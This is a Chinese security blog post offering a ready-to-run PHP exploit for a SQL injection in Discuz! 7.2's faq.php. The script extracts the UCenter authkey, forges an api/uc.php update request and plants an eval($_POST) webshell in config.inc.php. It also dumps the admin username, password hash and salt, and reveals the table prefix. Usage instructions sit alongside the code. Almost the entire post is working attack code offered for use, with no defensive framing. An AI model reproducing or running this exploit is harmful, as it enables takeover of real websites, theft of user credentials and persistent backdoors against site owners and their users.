Discuz! 7.2 SQL注入exp

已经有人写出一些工具了,但是感觉不怎么好用,就自己写了个。

参数:
1.可直接getshell
2.爆管理账号密码
3.爆表前缀
如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。

下载地址:DZ7.2
附代码:

<?php
 
/**
  * @author: xiaoma
  * @blog  : www.i0day.com
  * @date  : 2014.7.2 23:1
  */
 
error_reporting (0);
set_time_limit(3000);
$host = $argv [1];
$path = $argv [2];
$js = $argv [3];
$timestamp = time()+10*3600;
$table = "cdb_" ; //表名
 
if ( $argc < 2) {
     print_r('
   ********************************************************
   *  Discuz faq.php SQL Injection Exp                    *
   *  ---------By:Www.i0day.com-----------               *
   *     Usage: php '.$argv[0].' url 1                    *
   *  -------------------------------------               *
   *  js选项: 1.GetShell 2.取密码 3.查表前缀              *
   *                                                      *
   *   php '.$argv[0].' Www.i0day.com / 1                    *
   *   php '.$argv[0].' Www.i0day.com /dz72/ 1               *
   *                                                      *
   *                                                      *
   ********************************************************
      ');
      exit ;
}
if ( $js ==1){
     $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a3a,(select%20length(authkey)%20from%20" . $table . "uc_applications%20limit%200,1),0x3a3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23" ;
     $resp = sendpack( $host , $path , $sql );
 
     if ( strpos ( $resp , "::" )==-1){
         echo '表前缀可能不是默认cdb_ 请先查看表前缀!' ;
     } else {
     preg_match( "/::(.*)::/" , $resp , $matches );
     $lenght = intval ( $matches [1]);
     if ( $lenght ){
         if ( $lenght <=124){
             $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,1,62)%20from%20" . $table . "uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23" ;
             $resp = sendpack( $host , $path , $sql );
             if ( strpos ( $resp , "1\^" )!=-1){
                 preg_match( "/1\^(.*)\'/U" , $resp , $key1 );
             $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,63,62)%20from%20" . $table . "uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23" ;
             $resp = sendpack( $host , $path , $sql );
             preg_match( "/1\^(.*)\'/U" , $resp , $key2 );
             $key = $key1 [1]. $key2 [1];
             $code =urlencode(_authcode( "time=$timestamp&action=updateapps" , 'ENCODE' , $key ));
             $cmd1 ='<?xml version= "1.0" encoding= "ISO-8859-1" ?>
<root>
  <item id= "UC_API" >bbs.49you.com\'); eval ( $_POST [i0day]); //</item>
</root>';
             $cmd2 ='<?xml version= "1.0" encoding= "ISO-8859-1" ?>
<root>
  <item id= "UC_API" >bbs.49you.com</item>
</root>';
             $html1 = send( $cmd1 );
             $res1 = substr ( $html1 ,-1);
             $html2 = send( $cmd2 );
             $res2 = substr ( $html1 ,-1);
             if ( $res1 == '1' && $res2 == '1' ){
             echo "shell地址:http://" . $host . $path . 'config.inc.php   pass:i0day' ;
             }
             } else {
                 echo '获取失败' ;
             }
         }
     }
    }       
 
} elseif ( $js ==2){
     $sql = "action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%280x5E5E5E,username,0x3a,password,0x3a,salt%29%20from%20" . $table . "uc_members%20limit%200,1%29,floor%28rand%280%29*2%29,0x5E%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23" ;
     $resp = sendpack( $host , $path , $sql );
     if ( strpos ( $resp , "\^\^\^" )!=-1){
         preg_match( "/\^\^\^(.*)\^/U" , $resp , $password );
         echo '密码:' . $password [1];
         } else {
             echo '表前缀可能不是默认cdb_ 请先查看表前缀!' ;
         }
} elseif ( $js ==3){
     $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20hex(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),0x5E)x%20from%20information_schema%20.tables%20group%20by%20x)a)%23" ;
     $resp = sendpack( $host , $path , $sql );
     if ( strpos ( $resp , "1\^" )!=-1){
         preg_match( "/1\^(.*)\^/U" , $resp , $t );
 
         if ( strpos ( $t [1], "cdb_" )!=-1){
             echo "表名为:" .hex2str( $t [1]). " 表前缀为默认cdb_ 无需修改" ;
         } else {
             echo "表名:" .hex2str( $t [1]). ' 不是默认表名cdb_请自行修改代码中的$table' ;
         }
     } else {
         echo "查看表前缀失败,Sorry" ;
     }
} else {
     echo "未选择脚本功能" ;
}
 
function sendpack( $host , $path , $sql , $js ){
        $data = "GET " . $path . "/faq.php?" . $sql . " HTTP/1.1\r\n" ;
         $data .= "Host:" . $host . "\r\n" ;
         $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0\r\n" ;
         $data .= "Connection: close\r\n\r\n" ;
         //$data.=$html."\r\n";
         $ock = fsockopen ( $host ,80);
 
         if (! $ock ){
         echo "No response from " . $host ;
         die ();
 
         }
         fwrite( $ock , $data );
 
         $resp = '' ;
 
         while (! feof ( $ock )) {
 
                 $resp .= fread ( $ock , 1024);
                 }
 
         return $resp ;
 
}
function send( $cmd ){
     global $host , $code , $path ;
     $message = "POST " . $path . "/api/uc.php?code=" . $code . "  HTTP/1.1\r\n" ;
     $message .= "Accept: */*\r\n" ;
     $message .= "Referer: " . $host . "\r\n" ;
     $message .= "Accept-Language: zh-cn\r\n" ;
     $message .= "Content-Type: application/x-www-form-urlencoded\r\n" ;
     $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n" ;
     $message .= "Host: " . $host . "\r\n" ;
     $message .= "Content-Length: " . strlen ( $cmd ). "\r\n" ;
     $message .= "Connection: Close\r\n\r\n" ;
     $message .= $cmd ;
 
     //var_dump($message);
     $fp = fsockopen ( $host , 80);
     fputs ( $fp , $message );
 
     $resp = '' ;
 
     while ( $fp && ! feof ( $fp ))
         $resp .= fread ( $fp , 1024);
 
     return $resp ;
}
 
function _authcode( $string , $operation = 'DECODE' , $key = '' , $expiry = 0) {
     $ckey_length = 4;
 
     $key = md5( $key ? $key : UC_KEY);
     $keya = md5( substr ( $key , 0, 16));
     $keyb = md5( substr ( $key , 16, 16));
     $keyc = $ckey_length ? ( $operation == 'DECODE' ? substr ( $string , 0, $ckey_length ): substr (md5(microtime()), - $ckey_length )) : '' ;
 
     $cryptkey = $keya .md5( $keya . $keyc );
     $key_length = strlen ( $cryptkey );
 
     $string = $operation == 'DECODE' ? base64_decode ( substr ( $string , $ckey_length )) : sprintf( '%010d' , $expiry ? $expiry + time() : 0). substr (md5( $string . $keyb ), 0, 16). $string ;
     $string_length = strlen ( $string );
 
     $result = '' ;
     $box = range(0, 255);
 
     $rndkey = array ();
     for ( $i = 0; $i <= 255; $i ++) {
         $rndkey [ $i ] = ord( $cryptkey [ $i % $key_length ]);
     }
 
     for ( $j = $i = 0; $i < 256; $i ++) {
         $j = ( $j + $box [ $i ] + $rndkey [ $i ]) % 256;
         $tmp = $box [ $i ];
         $box [ $i ] = $box [ $j ];
         $box [ $j ] = $tmp ;
     }
 
     for ( $a = $j = $i = 0; $i < $string_length ; $i ++) {
         $a = ( $a + 1) % 256;
         $j = ( $j + $box [ $a ]) % 256;
         $tmp = $box [ $a ];
         $box [ $a ] = $box [ $j ];
         $box [ $j ] = $tmp ;
         $result .= chr (ord( $string [ $i ]) ^ ( $box [( $box [ $a ] + $box [ $j ]) % 256]));
     }
 
     if ( $operation == 'DECODE' ) {
         if (( substr ( $result , 0, 10) == 0 || substr ( $result , 0, 10) - time() > 0) && substr ( $result , 10, 16) == substr (md5( substr ( $result , 26). $keyb ), 0, 16)) {
             return substr ( $result , 26);
         } else {
                 return '' ;
             }
     } else {
         return $keyc . str_replace ( '=' , '' , base64_encode ( $result ));
     }
 
}
function hex2str( $hex ){
     $str = '' ;
     $arr = str_split ( $hex , 2);
     foreach ( $arr as $bit ){
         $str .= chr (hexdec( $bit ));
     }
     return $str ;
     }
?>

转载文章请注明,转载自:小马's Blog http://www.i0day.com

本文链接: http://www.i0day.com/1756.html

你可能感兴趣的:(discuz)